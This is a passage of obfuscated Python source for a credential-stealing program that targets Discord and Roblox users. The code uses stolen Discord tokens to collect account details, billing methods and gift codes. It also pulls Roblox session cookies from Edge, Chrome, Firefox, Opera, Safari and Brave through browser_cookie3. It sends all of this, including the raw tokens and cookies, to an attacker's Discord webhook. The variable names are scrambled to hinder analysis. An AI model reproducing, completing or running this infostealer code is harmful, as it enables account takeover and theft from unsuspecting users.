            HPGWTBNLIDAITFDUNVLOWJNJMRNDTAWHMEETWFQVSOHXPKWIMKAOCQACQK = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('username', "None") + '#' + JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('discriminator', "None")
            GRWBVASJHFFLYMUECBBNVGFCROFRSNAZXHKLIEJBXUOITEPYBUVACIHVSDLMMJJVSBNAQQMQXSIPONLW = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('global_name', "None")
            LOXOIBKLJGOKATYRUJNMBVYUZWLXWYUFMSSRRYSQKUWYDVRGZSRSBIROBYGOFOEGTXNQGV = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('id', "None")
            CYFLDNNKFGJAZDEQDECAICOTOZKWZSNSXNQUPSZHIWDABBQKFAKLTCCKGLIMUDKCTFZHOIIOZMLLTPPKQYZINJABWUUOSOXAIQTA = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('email', "None")
            XKEXQAQCTYDNSHNVSQCSBOYVHWFTIWAMAODDSYWVRCZTDNXEPYGLQIUIEIPUISNNWPJYKESCZVLYHSUCSVCGS = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('verified', "None")
            KHCMMWJEMHDANLSDDALNBCKHBFCOMNNNDTKALKEHCZEGCIAIQOIKBXZLGSILKUXNJEVQLM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('phone', "None")
            WCZKBNUSHMDASPEONMWJGDWFXPEJQHPFMPQGQCIWOGFPHOQPCIMZBSJMUFJVNMRSFQUEVBCBXVPZFBKXSMNE = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('locale', "None")
            JBOXQBIBWLLHYTWXFRXOOASCDPYTWGUVHVISARGFLFMWYKSFGWISAGSLRGDHDMWPLAVRIOGQHBRKASWMP = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('mfa_enabled', "None")

            try:
                if JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('premium_type', 'None') == 0:
                    NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = 'False'
                elif JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('premium_type', 'None') == 1:
                    NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = 'Nitro Classic'
                elif JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('premium_type', 'None') == 2:
                    NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = 'Nitro Boosts'
                elif JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('premium_type', 'None') == 3:
                    NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = 'Nitro Basic'
                else:
                    NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = 'False'
            except:
                NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL = "None"

            try: 
                QUQZGBPGLSWCRTFBRCXFLXDWVBFOVRQAQSLZRAPCHVPQFDMQBGCGNOLXHNHSBOKJQTCVXZVONZXUSQXAIFSOVRLPJZR = f"https://cdn.discordapp.com/avatars/{LOXOIBKLJGOKATYRUJNMBVYUZWLXWYUFMSSRRYSQKUWYDVRGZSRSBIROBYGOFOEGTXNQGV}/{JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK['avatar']}.gif" if requests.get(f"https://cdn.discordapp.com/avatars/{LOXOIBKLJGOKATYRUJNMBVYUZWLXWYUFMSSRRYSQKUWYDVRGZSRSBIROBYGOFOEGTXNQGV}/{JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK['avatar']}.gif").status_code == 200 else f"https://cdn.discordapp.com/avatars/{LOXOIBKLJGOKATYRUJNMBVYUZWLXWYUFMSSRRYSQKUWYDVRGZSRSBIROBYGOFOEGTXNQGV}/{JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK['avatar']}.png"
            except: 
                QUQZGBPGLSWCRTFBRCXFLXDWVBFOVRQAQSLZRAPCHVPQFDMQBGCGNOLXHNHSBOKJQTCVXZVONZXUSQXAIFSOVRLPJZR = VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM

            try:
                NVIGWPEJHYULRFWSHFEKQJDRHSCVHAKCMRJIXRDDUBHYVVNQXA = requests.get('https://discord.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd}).json()
                if NVIGWPEJHYULRFWSHFEKQJDRHSCVHAKCMRJIXRDDUBHYVVNQXA:
                    UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA = []

                    for v4r_method in NVIGWPEJHYULRFWSHFEKQJDRHSCVHAKCMRJIXRDDUBHYVVNQXA:
                        if v4r_method['type'] == 1:
                            UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA.append('CB')
                        elif v4r_method['type'] == 2:
                            UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA.append("Paypal")
                        else:
                            UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA.append('Other')
                    UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA = ' / '.join(UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA)
                else:
                    UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA = "None"
            except:
                UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA = "None"

            try:
                RBSAZOPEQFYMEXYRGVXGWKIAEEXKOVZNVODBMBQCPBWRVMNSQCNDVZSKXYVGIFVPRLYVOMXNKNYJRANNZK = requests.get('https://discord.com/api/v9/users/@me/outbound-promotions/codes', headers={'Authorization': UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd}).json()
                if RBSAZOPEQFYMEXYRGVXGWKIAEEXKOVZNVODBMBQCPBWRVMNSQCNDVZSKXYVGIFVPRLYVOMXNKNYJRANNZK:
                    OJQFQUIDLUYIYJGASEJLKONUNJVQBDRBWKLFTGDEHPUOYWRINFSLGXUYTDGQBM = []
                    for ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT in RBSAZOPEQFYMEXYRGVXGWKIAEEXKOVZNVODBMBQCPBWRVMNSQCNDVZSKXYVGIFVPRLYVOMXNKNYJRANNZK:
                        CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM = ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT['promotion']['outbound_title']
                        ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT = ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT['code']
                        OFTSJZYDRYJNAPRJYGKIDWPPKXTFKXSKJGTDPPWONHMCPZPXADVDXCGJIJEQYJKBHMUIVGGZXJPTFFDGPBZJ = f"Gift: {CQELMTTTTDHXFGRFCHLNXDHEDFMHIONXANHUDKHYWDSBORKWHGNZIYZRVNHTHXLCVEXMCXVHYNOLHHWMHNYJM}\nCode: {ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT}"
                        if len('\n\n'.join(ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT)) + len(OFTSJZYDRYJNAPRJYGKIDWPPKXTFKXSKJGTDPPWONHMCPZPXADVDXCGJIJEQYJKBHMUIVGGZXJPTFFDGPBZJ) >= 1024:
                            break
                        OJQFQUIDLUYIYJGASEJLKONUNJVQBDRBWKLFTGDEHPUOYWRINFSLGXUYTDGQBM.append(OFTSJZYDRYJNAPRJYGKIDWPPKXTFKXSKJGTDPPWONHMCPZPXADVDXCGJIJEQYJKBHMUIVGGZXJPTFFDGPBZJ)
                    if len(OJQFQUIDLUYIYJGASEJLKONUNJVQBDRBWKLFTGDEHPUOYWRINFSLGXUYTDGQBM) > 0:
                        ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT = '\n\n'.join(OJQFQUIDLUYIYJGASEJLKONUNJVQBDRBWKLFTGDEHPUOYWRINFSLGXUYTDGQBM)
                    else:
                        ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT = "None"
                else:
                    ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT = "None"
            except:
                ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT = "None"
        
            v4r_software_name, CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF = JXSNAJWLJDPZESCXTVINNNGJKNWDXFMLARWZAFEJUIGLWOHBQBUWWSUBJTONSUDEOGGEXGZFGGTUVXZMTLKTXGX.get(UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd, ("Unknown Software", "Unknown location"))

            embed = Embed(title=f'Discord Token `{ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST} "{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}"`:', color=XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH)      
            embed.add_field(name=":file_folder: Path:", value=f"```{CNRCCAQFXAPLNFPLTEYWZUQKVJCRYOECFRPBSRSOQIVBKAAYBUJAQZANOHINJOGF}```", inline=True)
            embed.add_field(name=":globe_with_meridians: Token:", value=f"```{UOHYDJPUVHVVJFGQBCIBGIJPZUEPBQONGKXUKEPJOTEYABGZOJTKNSCGFCPDG_d15c0rd}```", inline=True)
            embed.add_field(name=":package: Software:", value=f"```{v4r_software_name}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Username:", value=f"```{HPGWTBNLIDAITFDUNVLOWJNJMRNDTAWHMEETWFQVSOHXPKWIMKAOCQACQK}```", inline=True)
            embed.add_field(name=":bust_in_silhouette: Display Name:", value=f"```{GRWBVASJHFFLYMUECBBNVGFCROFRSNAZXHKLIEJBXUOITEPYBUVACIHVSDLMMJJVSBNAQQMQXSIPONLW}```", inline=True)
            embed.add_field(name=":robot: Id:", value=f"```{LOXOIBKLJGOKATYRUJNMBVYUZWLXWYUFMSSRRYSQKUWYDVRGZSRSBIROBYGOFOEGTXNQGV}```", inline=True)
            embed.add_field(name=":e_mail: Email:", value=f"```{CYFLDNNKFGJAZDEQDECAICOTOZKWZSNSXNQUPSZHIWDABBQKFAKLTCCKGLIMUDKCTFZHOIIOZMLLTPPKQYZINJABWUUOSOXAIQTA}```", inline=True)
            embed.add_field(name=":white_check_mark: Email Verified:", value=f"```{XKEXQAQCTYDNSHNVSQCSBOYVHWFTIWAMAODDSYWVRCZTDNXEPYGLQIUIEIPUISNNWPJYKESCZVLYHSUCSVCGS}```", inline=True)
            embed.add_field(name=":telephone_receiver: Phone:", value=f"```{KHCMMWJEMHDANLSDDALNBCKHBFCOMNNNDTKALKEHCZEGCIAIQOIKBXZLGSILKUXNJEVQLM}```", inline=True)   
            embed.add_field(name=":rocket: Nitro:", value=f"```{NUIHOLXKONKIEKAZIWRLTRQSSKQRSJMFECKTKCFILIKKLEHPBL}```", inline=True)
            embed.add_field(name=":earth_africa: Language:", value=f"```{WCZKBNUSHMDASPEONMWJGDWFXPEJQHPFMPQGQCIWOGFPHOQPCIMZBSJMUFJVNMRSFQUEVBCBXVPZFBKXSMNE}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{UWHSDPHDYYMNZGRFDDVMHZLDZKNBVBUTADNDJFNZJYLHWHXSYZDPPBXZNTYSPWCZTQCYCXJMHBA}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{ECECEDRCGIHGWBNCUWUUHSLAEEOEUKOVSRYPNCVRWSCZKUXLKRAGAMKAVKMTRNVGPMBPTWMHONHLMZDAOKNBLRQOVFRT}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{JBOXQBIBWLLHYTWXFRXOOASCDPYTWGUVHVISARGFLFMWYKSFGWISAGSLRGDHDMWPLAVRIOGQHBRKASWMP}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=QUQZGBPGLSWCRTFBRCXFLXDWVBFOVRQAQSLZRAPCHVPQFDMQBGCGNOLXHNHSBOKJQTCVXZVONZXUSQXAIFSOVRLPJZR)
            embed.set_footer(text=GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK, icon_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
            HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI.send(embed=embed, username=CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, avatar_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)

    upload_t0k3n5()

def R0b10x_C00ki3():
    import browser_cookie3
    import requests
    import json
    from discord import SyncWebhook, Embed
    import discord

    VIWQJMAWCETODURZVWESFITPXLHRZFSGSMEUQNDOKAZBJWMHMOVCBJW = []
    def g3t_c00ki3_4nd_n4vig4t0r(XRBTANBKHZUKWWNELQUCMHGJYLXWJMEQULYEOJSOFEEPVHSELSFTXFMTDOAYPCZEZUTOJPMRVMYKUTTFIXDGZAQRQABDFGBMJ):
        try:
            v4r_c00kie5 = XRBTANBKHZUKWWNELQUCMHGJYLXWJMEQULYEOJSOFEEPVHSELSFTXFMTDOAYPCZEZUTOJPMRVMYKUTTFIXDGZAQRQABDFGBMJ()
            v4r_c00kie5 = str(v4r_c00kie5)
            v4r_c00kie = v4r_c00kie5.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
            v4r_n4vigator = XRBTANBKHZUKWWNELQUCMHGJYLXWJMEQULYEOJSOFEEPVHSELSFTXFMTDOAYPCZEZUTOJPMRVMYKUTTFIXDGZAQRQABDFGBMJ.__name__
            return v4r_c00kie, v4r_n4vigator
        except:
            return None, None

    def Microsoft_Edge():
        return browser_cookie3.edge(domain_name="roblox.com")

    def Google_Chrome():
        return browser_cookie3.chrome(domain_name="roblox.com")

    def Firefox():
        return browser_cookie3.firefox(domain_name="roblox.com")

    def Opera():
        return browser_cookie3.opera(domain_name="roblox.com")
    
    def Opera_GX():
        return browser_cookie3.opera_gx(domain_name="roblox.com")

    def Safari():
        return browser_cookie3.safari(domain_name="roblox.com")

    def Brave():
        return browser_cookie3.brave(domain_name="roblox.com")

    FLPARVBFETTXVDNALRWJQIRGOQQICJWIVSNWKLVKHDTUCEADDGIKOIVLYSHJDSKCGINXIHDFPRNLMPYJQXCQWP = [Microsoft_Edge, Google_Chrome, Firefox, Opera, Opera_GX, Safari, Brave]
    for v4r_br0ws3r in FLPARVBFETTXVDNALRWJQIRGOQQICJWIVSNWKLVKHDTUCEADDGIKOIVLYSHJDSKCGINXIHDFPRNLMPYJQXCQWP:
        v4r_c00ki3, v4r_n4vigator = g3t_c00ki3_4nd_n4vig4t0r(v4r_br0ws3r)
        if v4r_c00ki3:
            if v4r_c00ki3 not in VIWQJMAWCETODURZVWESFITPXLHRZFSGSMEUQNDOKAZBJWMHMOVCBJW:
                VIWQJMAWCETODURZVWESFITPXLHRZFSGSMEUQNDOKAZBJWMHMOVCBJW.append(v4r_c00ki3)
                try:
                    FVAKXXJZAOVXFUFFCXZGAKYNCQMWVPKITWKBIBIPVVXVASPXGUSVQQNAWMEQMHHUFVTFEBPCXBHRHRNTJZ = requests.get("https://www.roblox.com/mobileapi/userinfo", cookies={".ROBLOSECURITY": v4r_c00ki3})
                    JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK = json.loads(FVAKXXJZAOVXFUFFCXZGAKYNCQMWVPKITWKBIBIPVVXVASPXGUSVQQNAWMEQMHHUFVTFEBPCXBHRHRNTJZ.text)
                except:
                    pass

                UKGAGAGMIEFHAGZQJDXTYSNTIFEGIWJBUJZDKDRMUDVBGRXTYBUULEKTAVZELUE = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('id', "None")
                NEIBDKVGYUDKWHVIWYUDOZNHHMZNCXIEOPTRYNUSRQWNYHCEUPPTXBHINGRYTUTNDTWDDJDUTTIRSDTUNXGWAVFCLMQZOMHLIW = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('displayName', "None")
                PBRRGCEOKNDRONSKONSEXCBEOAOHFIAJMJTZBXIECGYCRVIQZNLLDXFFRM = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get('name', "None")
                ZOIXKNPKWYDOEUOUURKNSWLTXRBNLWPRAPNWNBVZOALAHWTCCWOPO = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get("RobuxBalance", "None")
                PSSVIJFZRKGLGMXGRWOESCTNEEJWJZAFNJRRZTZSTLOHFPWJEFQFIZGZSHANZIMLWGHPQBEEZNNUYYLURHQ = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get("IsPremium", "None")
                VPNEBKEALYMIWHTJFRILGQTVCFQTLNYRUVEZDBTYNQFBZFXKNAJZNFLEGC = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get("ThumbnailUrl", "None")
                FQEOLUHFIYPNWOOIABEGVQGSFUQNKLDTZNDUUTRLZUJQUGQIWSCDHCUOTDWHCSHQFUUHSGHCW = JAUOFJAQSJYMNYAXZSEUISLWHYJZNAXJRMLQZQKUEZRRXOWXDMFVPIIQJCNK.get("IsAnyBuildersClubMember", "None")
        
                WWJWHJUODDKPHTHZBQWWRSAOQLCDBEJFMDLCARBUBAHDUAAKVMHKCMVJXQKBIA = len(v4r_c00ki3)
                GQVEOITDCBZVOTHXWBPCHMJMUCRQKNGUJCSQONSXMQOCHPUIMDBMVRPGYFWJCHEDQHXEW = WWJWHJUODDKPHTHZBQWWRSAOQLCDBEJFMDLCARBUBAHDUAAKVMHKCMVJXQKBIA // 2
                VORAFGNWWXGFJSGBBSBURYQIYHFEMIAGFCZRLYKNBISJLCQJUVRVDLWAHDOAHROMQPNHCJIYFBRLTKURWNZAIZU = v4r_c00ki3[:GQVEOITDCBZVOTHXWBPCHMJMUCRQKNGUJCSQONSXMQOCHPUIMDBMVRPGYFWJCHEDQHXEW]
                JEIEHXNLHVZCMLMRZYHLHXJKNNCOZHALAXBVYWEOQNKAQAODMWPDNVSQLQVPYKEUHIVDGBDDAJJBSAGOXRAL = v4r_c00ki3[GQVEOITDCBZVOTHXWBPCHMJMUCRQKNGUJCSQONSXMQOCHPUIMDBMVRPGYFWJCHEDQHXEW:]

                HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI = SyncWebhook.from_url(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN)

                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY = discord.Embed(
                    title=f'Roblox Cookie `{ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST} "{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}"`:',
                    color=XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH
                )
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.set_footer(text=GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK, icon_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.set_thumbnail(url=VPNEBKEALYMIWHTJFRILGQTVCFQTLNYRUVEZDBTYNQFBZFXKNAJZNFLEGC)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":compass: Navigator:", value=f"```{v4r_n4vigator}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":bust_in_silhouette: Username:", value=f"```{PBRRGCEOKNDRONSKONSEXCBEOAOHFIAJMJTZBXIECGYCRVIQZNLLDXFFRM}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":bust_in_silhouette: DisplayName:", value=f"```{NEIBDKVGYUDKWHVIWYUDOZNHHMZNCXIEOPTRYNUSRQWNYHCEUPPTXBHINGRYTUTNDTWDDJDUTTIRSDTUNXGWAVFCLMQZOMHLIW}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":robot: Id:", value=f"```{UKGAGAGMIEFHAGZQJDXTYSNTIFEGIWJBUJZDKDRMUDVBGRXTYBUULEKTAVZELUE}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":moneybag: Robux:", value=f"```{ZOIXKNPKWYDOEUOUURKNSWLTXRBNLWPRAPNWNBVZOALAHWTCCWOPO}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":tickets: Premium:", value=f"```{PSSVIJFZRKGLGMXGRWOESCTNEEJWJZAFNJRRZTZSTLOHFPWJEFQFIZGZSHANZIMLWGHPQBEEZNNUYYLURHQ}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":construction_site: Builders Club:", value=f"```{FQEOLUHFIYPNWOOIABEGVQGSFUQNKLDTZNDUUTRLZUJQUGQIWSCDHCUOTDWHCSHQFUUHSGHCW}```", inline=True)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":cookie: Cookie Part 1:", value=f"```{VORAFGNWWXGFJSGBBSBURYQIYHFEMIAGFCZRLYKNBISJLCQJUVRVDLWAHDOAHROMQPNHCJIYFBRLTKURWNZAIZU}```", inline=False)
                GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.add_field(name=":cookie: Cookie Part 2:", value=f"```{JEIEHXNLHVZCMLMRZYHLHXJKNNCOZHALAXBVYWEOQNKAQAODMWPDNVSQLQVPYKEUHIVDGBDDAJJBSAGOXRAL}```", inline=False)

                HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI.send(embed=GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY, username=CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA,
                                avatar_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
                
    if not VIWQJMAWCETODURZVWESFITPXLHRZFSGSMEUQNDOKAZBJWMHMOVCBJW:
        HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI = SyncWebhook.from_url(PTUGQSXYYQRVUXAQTVBEUHRVYOCRRPRXITWHNZTMFWZKVOLIDOJQSQJYTUXBGCAPTLMSERXVDRQEHYEN)
        GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY = Embed(
            title=f'Roblox Cookie `{ILBCVNKJOZYXEBSMFYCOKUQVEHDRAVNOOIFWGAWQYMPVUGGZERUCKJZOHDUJGRBIBWHCJXXVDQZTMXMRNZSHPALBRBYBST} "{TWLWNCOIZJYFVJJVNOBLNIRTPRPMHUIZTHOAAFCWSGDVYEXJKNUBPR}"`:', 
            description=f"No roblox cookie found.",
            color=XFOCFMWETLKNBSGDAFNFPWWACXSQQTCJMGVLOODVUMYRIZSMGDCTBJPDVLRHRLUIHGCHDKUBXUAFROMKLGEHXNTNSQXDNMH)
        GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY.set_footer(text=GYWFMHHKMFRPCNVJZJWRQOJUYSYYUCFCRJDGJTVSFVWCOQZTQBPCFFLUZFNK, icon_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)
        HJUCXCCTDNCBVKFKLEPEFFXWGKCVQORRWXGXYAXCWOGRNGHSUMODUSEJKFFBWI.send(embed=GNHSDRQCBTJKOIXKUBMESJWJQHQBHJSVBILLGTEHXFHKWHDNBAJBEEQXEY, username=CMKPWIFCSFCTSNNVOGCCKVQEYKRAXRHOBFRMIJVXPYIPEACUDGZUIXNGDSPUGBWRSLWEMRRWYXKICA, avatar_url=VBKGDSUSVCQABAPEKXIUZFQODIVCHJYRJSRNZJISFBCGLICNMWIBJILFXFCLOLTTJAZIHTTVAOM)

